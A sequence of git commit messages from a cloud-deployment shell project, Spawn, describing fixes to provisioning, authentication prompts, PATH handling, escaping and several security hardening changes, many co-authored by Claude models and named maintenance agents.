* fix: rewrite hetzner common.sh + fix token prompt bug in shared/common.sh
Hetzner: rewrote from 621 to 224 lines. Removed hcloud CLI dual-path
fallback, server type validation/fallback chain (11 functions), and
duplicate CLI+API implementations. Now API-only like DigitalOcean.
Shared: fixed echo "" in _prompt_for_api_token, get_openrouter_api_key_manual,
and get_openrouter_api_key_oauth writing to stdout instead of stderr.
These functions are called inside $(...) command substitutions, so the
newlines got prepended to the captured token, causing "unable to
authenticate" errors when pasting tokens at the prompt.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: rewrite daytona common.sh — API-only, drop CLI dependency
Rewrote from 312 to 174 lines. Removed daytona CLI dependency in
favor of direct REST API calls. Matches the same API-only pattern
used by Hetzner, DigitalOcean, and other clouds.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pass SSH port to control master exit in daytona interactive/destroy
The ssh -O exit command to close the multiplexed master was missing
the -p PORT flag when DAYTONA_SSH_PORT is set. This left the master
connection open, causing "mux_client: master did not respond" errors
when the interactive session tried to allocate a PTY.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add spawn name prompt and project confirmation to GCP flow
Ask for spawn name upfront (before auth), derive kebab-case default for
VM naming, and confirm the current GCP project before using it.
New interaction order:
1. Spawn name: "My Dev Box" → kebab "my-dev-box" exported as
GCP_INSTANCE_NAME_KEBAB
2. gcloud auth + project confirm: "Current project: X Keep? [Y/n]"
If no → project picker shown
3. SSH key
4. Machine type picker (existing)
5. Zone picker (existing)
6. Instance name prompt: "Instance name [my-dev-box]: "
User can press Enter to accept or type a custom name
New functions:
_to_kebab_case() — lowercases, replaces non-alnum with hyphens
_gcp_prompt_spawn_name() — prompts for display name, exports kebab default;
honours SPAWN_NAME env var set by CLI (--name flag)
Modified:
_gcp_resolve_project() — adds Y/n confirmation when project already set
get_server_name() — shows kebab default in prompt, accepts Enter
cloud_authenticate() — calls _gcp_prompt_spawn_name first
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* feat: add spawn name prompt to all clouds via shared/common.sh
Move _to_kebab_case() and prompt_spawn_name() to shared/common.sh so all
clouds get upfront spawn name prompting and kebab-based resource naming.
shared/common.sh:
+ _to_kebab_case() — "My Dev Box" → "my-dev-box"
+ prompt_spawn_name() — asks for display name, exports SPAWN_NAME_DISPLAY
and SPAWN_NAME_KEBAB; skips if already set;
honours SPAWN_NAME env var from CLI --name flag
~ get_resource_name() — replaces silent SPAWN_NAME fallback with a visible
prefilled default: "Enter server name [my-dev-box]: "
Per-cloud changes (cloud_authenticate gains prompt_spawn_name first):
hetzner, fly, aws, daytona, digitalocean, sprite — one-line change each
gcp/lib/common.sh:
- Remove _to_kebab_case() (now in shared)
- Remove _gcp_prompt_spawn_name() (now in shared as prompt_spawn_name)
~ cloud_authenticate: _gcp_prompt_spawn_name → prompt_spawn_name
~ get_server_name: simplified back to get_validated_server_name
(shared get_resource_name now shows the kebab default in the prompt)
Result — every cloud shows this flow upfront:
Spawn name (e.g. "My Dev Box"): My Claude Box
ℹ Resource name: my-claude-box
...
Enter server name [my-claude-box]: ⏎
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* fix: use "Use project '...'?" instead of "Keep this project?" in GCP prompt
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* feat: add spawn pick to _display_and_select in shared/common.sh
All clouds using interactive_pick (Hetzner, DigitalOcean, AWS, fly, etc.)
now get the arrow-key picker UI when the user runs via `spawn`.
Placement: between fzf (rarely installed) and numbered list (plain fallback).
Priority: fzf > spawn pick > numbered list.
Pipe-delimited items "id|field2|field3..." are converted to tab-delimited
"id\tid\tfield2 · field3 · ..." so spawn pick displays:
> cx22 2 vCPU · 4.0 GB RAM · 40 GB disk · shared · $ 0.0057/hr
> fsn1 Falkenstein · DE
The --default flag uses default_id when set, otherwise default_value,
so the correct item is pre-selected when the picker opens.
No 2>/dev/tty redirect (avoids the zsh 'file exists' failure that broke
the GCP picker; spawn pick opens /dev/tty internally via fs.openSync).
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* refactor: replace custom _gcp_interactive_pick with shared interactive_pick
- Remove _gcp_interactive_pick (60 lines of custom picker logic)
- Convert option functions to pipe-delimited format (id|detail)
to match what interactive_pick / _display_and_select expect
- Replace _gcp_pick_{machine_type,zone,project} with direct
interactive_pick calls — same pattern as Hetzner
- _gcp_project_options: awk now outputs id|name instead of id\tid\tname
GCP now gets fzf → spawn pick → numbered list for free via the
shared helper, with no cloud-specific picker code.
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
The json_escape fallback (used when python3 is unavailable) only escaped
backslashes and double quotes, producing invalid JSON when input contained
newlines, tabs, or carriage returns. This could cause JSON injection in
API request bodies sent to cloud providers (Hetzner, DigitalOcean, Fly.io)
and corrupt credential config files.
Add escaping for \n, \r, and \t in the fallback path. The python3 primary
path (json.dumps) was already correct.
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove backslash before $ in regex pattern so it anchors to end-of-string
rather than matching a literal dollar sign. This restores proper validation
of OAuth codes (16-128 alphanumeric chars only).
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: persist gh auth credentials to disk for interactive sessions
When GITHUB_TOKEN is in the environment, gh auth status returns success
(gh checks env vars first), so ensure_gh_auth() short-circuits before
gh auth login --with-token writes credentials to ~/.config/gh/hosts.yml.
The interactive session starts without GITHUB_TOKEN in env, so gh reports
"not logged into any GitHub hosts".
Fix: always run gh auth login --with-token when GITHUB_TOKEN is set,
persisting credentials to disk regardless of gh auth status.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: unset GITHUB_TOKEN env var before gh auth login --with-token
gh refuses to store credentials when GITHUB_TOKEN is already set in
the environment: "The value of the GITHUB_TOKEN environment variable
is being used for authentication." Save the value, unset the env var,
pipe it to gh auth login, then re-export.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review — validate token format, skip if already persisted
- Add GITHUB_TOKEN format validation (ghp_, gho_, ghu_, ghs_, ghr_, github_pat_)
- Add fast path: check gh auth status with env var unset before persisting
- Document plaintext credential store behavior (standard gh CLI behavior)
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Codex CLI's OPENAI_BASE_URL env var approach causes "Invalid Responses
API request" errors because OpenRouter doesn't fully support the
Responses API wire format via base URL override. Switch all 8 codex
scripts to use ~/.codex/config.toml with model_provider="openrouter"
which uses the native OpenRouter integration.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Release assets use x64 not x86_64 (opencode-linux-x64.tar.gz) and
darwin not mac (opencode-darwin-arm64.tar.gz). The arch mapping only
handled aarch64→arm64 but missed x86_64→x64, causing 404 on all
x86_64 servers.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: sprite npm PATH resolution and gateway timeout
Sprites use nvm-managed node, so npm global bin is at
/.sprite/languages/node/nvm/.../bin/ which isn't in default PATH.
Dynamically resolve $(npm prefix -g)/bin in install, launch, and
gateway commands for all sprite agents.
Also increase openclaw gateway timeout from 30s to 60s — gateway
starts slowly on sprites but TUI connects once ready.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add opencode bin dir to PATH in sprite launch command
OpenCode installs to $HOME/.opencode/bin/ which isn't in the sprite's
default PATH or the npm prefix path.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pass -o org flag to all sprite CLI commands
sprite create/exec/list/destroy fail with "authentication failed" when
the org isn't passed explicitly. Detect the selected org after login and
thread it through all sprite commands via _sprite_org_flags().
Also fix ensure_sprite_authenticated to fail loudly instead of
swallowing errors with || true.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: sprite scripts fail when zsh is not available
setup_shell_environment overwrites .bashrc with `exec zsh`, but sprites
don't have zsh installed. This breaks PATH and causes all agent launch
commands that source .zshrc to fail.
- Only switch to zsh if it's actually available on the sprite
- Replace `source ~/.zshrc` with explicit PATH in all sprite agent
launch commands (openclaw, opencode, codex, kilocode)
- Fix start_openclaw_gateway to use explicit PATH instead of .zshrc
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: openclaw not found on sprite — bashrc corruption from prior runs
On reused sprites, .bashrc still has `exec /usr/bin/zsh -l` from a prior
run. Sourcing it in the install command causes `&&` to short-circuit, so
`bun install -g openclaw` never runs.
- Clean up stale `exec zsh` lines from .bashrc at start of
setup_shell_environment (fixes reused sprites)
- Use explicit PATH in openclaw install command instead of relying on
.bashrc
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use npm instead of bun for openclaw install on sprite
bun 1.3.9 on sprites fails with "connection closed" during dependency
resolution. Other sprite agents (codex, kilocode) already use npm
successfully.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: openclaw install — npm+bun fallback, verify binary exists
Try npm first (more reliable on sprites), fall back to bun, then verify
the binary is actually in PATH before continuing.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: persist npm global bin path to .spawnrc on sprites
npm installs openclaw successfully but its global bin dir isn't in the
sprite's default PATH. Detect the npm bin path after install, write it
to .spawnrc so gateway and launch commands (which source .spawnrc) find
the binary.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Point OpenClaw to https://github.com/openclaw/openclaw and OpenCode to
https://github.com/anomalyco/opencode. Update the OpenCode install command
and binary download URL to match the new repo.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
These 5 agents are being dropped from the Spawn matrix. This removes
45 agent scripts across 9 clouds, cleans the manifest, test fixtures,
READMEs, CLI source, and shared library comments.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
PR #1462 removed duplicate get_or_prompt_api_key and get_model_id_interactive
calls in spawn_agent(). PR #1468 accidentally re-introduced them with incorrect
step numbering (two "4"s and two "5"s). This doubled API validation requests on
every deployment across all 130+ agent scripts.
Also fix OVH cloud_provision not exporting OVH_SERVER_NAME, causing
save_vm_connection to record an empty server name when the user types the name
at the interactive prompt instead of passing it via env var.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
save_vm_connection built JSON via direct string interpolation, which
produces malformed output if any value contains quotes, backslashes,
or other JSON-special characters. This breaks spawn list/delete/history.
Changes:
- Use json_escape for all string fields in save_vm_connection
- Use json_escape for GCP zone/project metadata values
- Switch AWS, GCP, Daytona get_server_name to get_validated_server_name
for consistency with Hetzner, DigitalOcean, Fly, OVH
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* docs: add spawn delete command to README
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: harden openclaw across all clouds — validation, reliability, performance
Fixes multiple issues causing openclaw to break on most clouds:
Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)
Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check
Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback
Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: skip sudo in gh install when running as root (Fly.io containers)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id
- verify_openrouter_key and verify_openrouter_model skip network calls when
SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove double-escaping in install_agent that broke shell operators
install_agent() was wrapping commands with printf '%q' + bash -c before
passing them to the run callback. But run callbacks (run_server, run_sprite,
ssh_run_server) already handle escaping for remote transport. The double-
escaping turned && || > | into literal characters, causing 'source' to
treat the entire command as a single filename.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use local github-auth.sh instead of curling from main
When running from a local checkout, base64-encode the local
github-auth.sh and send it inline to the remote machine. This
ensures fixes (like the sudo skip for root) take effect immediately
without waiting for a merge to main.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle github-auth errors gracefully instead of terminating
GitHub CLI setup is optional — failures should not abort the spawn
session. Guard both run_callback calls in offer_github_auth with
|| log_warn so the script continues even if gh install fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use GOOGLE_GEMINI_BASE_URL to route Gemini CLI through OpenRouter
Gemini CLI ignores OPENAI_BASE_URL — it uses GEMINI_API_KEY to talk
directly to Google's API. The OpenRouter key is not a valid Google
API key, so all requests fail with "API key not valid".
Use GOOGLE_GEMINI_BASE_URL to redirect Gemini CLI to OpenRouter's
endpoint. Fixes all 9 cloud gemini scripts + manifest.json.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: guard optional spawn_agent hooks so failures don't kill the session
With set -eo pipefail, any unguarded failure terminates the script.
Several optional operations in spawn_agent were unguarded:
- agent_configure: config file uploads (agent works with defaults)
- agent_save_connection: convenience JSON for spawn list
- agent_pre_launch: gateway daemons, startup hooks
- agent_pre_provision: pre-provision prompts
- .spawnrc shell hooks: hooking env vars into .bashrc/.zshrc
These now log warnings and continue instead of aborting. Critical
steps (cloud_authenticate, agent_install, cloud_provision) still
exit on failure.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: audit and fix env vars, escaping, and error handling across all agents
Audit findings from 3 parallel agents, fixes applied:
**Env vars (4 agents fixed across 9 clouds each = 36 scripts):**
- Amazon Q: remove fake OPENAI_* vars (Q uses AWS auth, can't use OpenRouter)
- Cline: replace OPENAI_* env vars with `cline auth -p openrouter` command
- Open Interpreter: drop OPENAI_* vars, use only OPENROUTER_API_KEY (native support via --model flag)
- NanoClaw: add ANTHROPIC_BASE_URL to .env file (was missing, requests went to Anthropic directly)
**Escaping:**
- execute_agent_non_interactive: replace printf '%q' with single-quote wrapping to avoid double-escaping on Fly.io
**Manifest updated** for amazonq, cline, interpreter entries.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use setsid to detach openclaw gateway daemon from SSH sessions
The gateway daemon launch (`nohup openclaw gateway ... & disown`) hangs
on all clouds because SSH/exec channels wait for child FDs to close.
setsid creates a new session, fully detaching the daemon so the channel
can close immediately. Falls back to nohup where setsid is unavailable.
Consolidates the daemon launch into a shared start_openclaw_gateway()
function used by all 9 cloud scripts.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: configure npm global prefix for non-root clouds (AWS, GCP, OVH)
AWS Lightsail, GCP, and OVH SSH as non-root users (ubuntu/login user),
so `npm install -g` fails with EACCES on /usr/local/lib/node_modules/.
Fix: configure npm prefix to ~/.npm-global during cloud-init/setup and
add ~/.npm-global/bin to the SSH PATH prefix so agent install commands
find globally-installed npm binaries without sudo.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove broken OpenRouter routing from Gemini CLI scripts
Gemini CLI uses Google's native API format (/v1beta/models/:streamGenerateContent),
not the OpenAI-compatible format (/v1/chat/completions). No base URL override can
bridge this — the request formats are fundamentally incompatible. Same situation
as Amazon Q (uses vendor-specific auth/API).
Removed GEMINI_API_KEY and GOOGLE_GEMINI_BASE_URL from all 9 scripts + manifest.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: auto-install AWS CLI and gcloud SDK when missing
Instead of printing manual install instructions and exiting, both CLIs
now auto-install:
- AWS: downloads official .pkg (macOS) or .zip (Linux) installer
- GCP: uses brew cask on macOS, Google's tarball installer on Linux
Falls back to manual instructions if auto-install fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: nanoclaw — install Docker on Linux, fix hardcoded /root/ path
Two issues broke NanoClaw on all clouds:
1. .env upload hardcoded /root/nanoclaw/.env — fails on non-root clouds
(AWS=ubuntu, GCP=user, OVH=ubuntu). Now uses upload_config_file with
$HOME which expands on the remote side.
2. NanoClaw requires a container runtime. On Linux it uses Docker, but
Docker was never installed. Added Docker install via get.docker.com
to all cloud scripts (with sudo where SSH user is non-root).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review findings from PR #1463
- Reject symlinked github-auth.sh before base64-encoding (falls back to remote URL)
- Hide API key from process list using curl -K - instead of -H in verify_openrouter_key
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: quote OPENROUTER_API_KEY in cline auth to prevent command injection
Unquoted variable in `cline auth -p openrouter -k ${OPENROUTER_API_KEY}`
allows shell metacharacters in the key to execute arbitrary commands on
the remote server. Wrapping in escaped double quotes prevents expansion.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Steps 3-4 (get_or_prompt_api_key and model selection) were executed
twice in spawn_agent() -- once before provisioning and once after.
This caused redundant HTTP validation calls to openrouter.ai/api for
every agent deployment (~130+ scripts use spawn_agent). The duplicate
step numbering in comments (3,4,5 then 4,5,6) confirms this was
accidental.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* docs: add spawn delete command to README
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: harden openclaw across all clouds — validation, reliability, performance
Fixes multiple issues causing openclaw to break on most clouds:
Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)
Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check
Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback
Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: skip sudo in gh install when running as root (Fly.io containers)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id
- verify_openrouter_key and verify_openrouter_model skip network calls when
SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove double-escaping in install_agent that broke shell operators
install_agent() was wrapping commands with printf '%q' + bash -c before
passing them to the run callback. But run callbacks (run_server, run_sprite,
ssh_run_server) already handle escaping for remote transport. The double-
escaping turned && || > | into literal characters, causing 'source' to
treat the entire command as a single filename.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use local github-auth.sh instead of curling from main
When running from a local checkout, base64-encode the local
github-auth.sh and send it inline to the remote machine. This
ensures fixes (like the sudo skip for root) take effect immediately
without waiting for a merge to main.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle github-auth errors gracefully instead of terminating
GitHub CLI setup is optional — failures should not abort the spawn
session. Guard both run_callback calls in offer_github_auth with
|| log_warn so the script continues even if gh install fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use GOOGLE_GEMINI_BASE_URL to route Gemini CLI through OpenRouter
Gemini CLI ignores OPENAI_BASE_URL — it uses GEMINI_API_KEY to talk
directly to Google's API. The OpenRouter key is not a valid Google
API key, so all requests fail with "API key not valid".
Use GOOGLE_GEMINI_BASE_URL to redirect Gemini CLI to OpenRouter's
endpoint. Fixes all 9 cloud gemini scripts + manifest.json.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: guard optional spawn_agent hooks so failures don't kill the session
With set -eo pipefail, any unguarded failure terminates the script.
Several optional operations in spawn_agent were unguarded:
- agent_configure: config file uploads (agent works with defaults)
- agent_save_connection: convenience JSON for spawn list
- agent_pre_launch: gateway daemons, startup hooks
- agent_pre_provision: pre-provision prompts
- .spawnrc shell hooks: hooking env vars into .bashrc/.zshrc
These now log warnings and continue instead of aborting. Critical
steps (cloud_authenticate, agent_install, cloud_provision) still
exit on failure.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* docs: add spawn delete command to README
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: harden openclaw across all clouds — validation, reliability, performance
Fixes multiple issues causing openclaw to break on most clouds:
Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)
Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check
Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback
Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: skip sudo in gh install when running as root (Fly.io containers)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address PR review — skip validation in tests, quote escaped cmd, escape model_id
- verify_openrouter_key and verify_openrouter_model skip network calls when
SPAWN_SKIP_API_VALIDATION, BUN_ENV=test, or NODE_ENV=test is set
- install_agent timeout wrapper now quotes the escaped command for defense in depth
- model_id in openclaw JSON now uses json_escape() for consistency
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: remove double-escaping in install_agent that broke shell operators
install_agent() was wrapping commands with printf '%q' + bash -c before
passing them to the run callback. But run callbacks (run_server, run_sprite,
ssh_run_server) already handle escaping for remote transport. The double-
escaping turned && || > | into literal characters, causing 'source' to
treat the entire command as a single filename.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fixes GitHub CLI authentication on remote VMs by passing local token through to remote installation script. Uses printf '%q' for safe shell escaping to prevent command injection.
Move OpenRouter OAuth and model selection prompts to run BEFORE
server provisioning in spawn_agent(). Previously the user had to
wait for the server to spin up before being prompted for their
API key and model choice. Now all interactive prompts (GitHub auth,
OpenRouter OAuth, model selection) happen upfront, then the server
provisions without further user interaction.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
1. _multi_creds_validate referenced undefined help_url variable, causing
empty "Get new credentials from: " error messages when OVH credential
validation fails. Added help_url as parameter and pass it from caller.
2. _spawn_inject_env_vars (used by 130+ agent scripts via spawn_agent)
uploaded credentials to static /tmp/env_config path. The older
inject_env_vars_ssh/inject_env_vars_cb functions document this as a
symlink attack vector and use randomized paths. Fixed to match.
3. Removed dead inject_env_vars_fly and inject_env_vars_sprite functions
(all agent scripts now use spawn_agent -> _spawn_inject_env_vars).
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds
aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.
Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.
Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: update aider/gptme/interpreter assertions from pip to uv
The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).
Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* ci: trigger test run for uv assertion fix
* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds
- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
$escaped_cmd that prevented the remote shell from consuming escapes,
breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
where it escaped shell operators into literal characters since daytona exec
has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add --pty to fly ssh console for interactive sessions
fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.
Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: prepend ~/.local/bin to PATH in ssh_run_server
After uv installs to ~/.local/bin, the current shell session doesn't
have it in PATH, causing "uv: command not found" on DigitalOcean and
all other SSH-based clouds (Hetzner, AWS, GCP, OVH).
Fly.io's run_server already prepends this PATH — now the shared
ssh_run_server does the same, fixing all SSH-based clouds at once.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add Node.js to cloud-init for all cloud providers
npm-based agents (codex, kilocode, etc.) fail with "npm: command not
found" because Node.js isn't installed during cloud-init. Fly.io was
the only provider installing Node.js (in wait_for_cloud_init).
Now all cloud-init scripts install Node.js v22 LTS from nodesource,
matching Fly.io's setup. Also adds ~/.local/bin to PATH in AWS and
GCP cloud-init (was already in shared/DigitalOcean/Hetzner).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use apt packages for nodejs/npm instead of nodesource
The nodesource setup script (setup_22.x) runs its own apt-get update
and repository configuration, nearly doubling cloud-init time and
causing hangs on DigitalOcean. Ubuntu 24.04 includes nodejs and npm
in its default repos — just add them to the packages list.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add timeouts and better error handling to Daytona CLI commands
Daytona CLI commands (login, list, create) can hang indefinitely when
the API is slow or unreachable. This causes:
- "Failed to create sandbox: timeout" with no recovery
- Token validation timeouts misreported as "invalid token"
- Users re-entering valid tokens that also timeout
Fixes:
- Wrap all daytona CLI calls with timeout (30s for auth, 120s for create)
- Detect timeout errors separately from auth errors
- Show actionable "try again / check status" messages for timeouts
- Add nodejs/npm to Daytona wait_for_cloud_init
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: set DAYTONA_API_URL to Daytona Cloud by default
The Daytona CLI may default to connecting to a local self-hosted
server instead of Daytona Cloud. Without DAYTONA_API_URL set to
https://app.daytona.io/api, every CLI command (login, list, create)
hangs trying to reach a non-existent local server and times out.
The SDK documents this as the default, but the CLI doesn't always
pick it up — now we export it explicitly.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
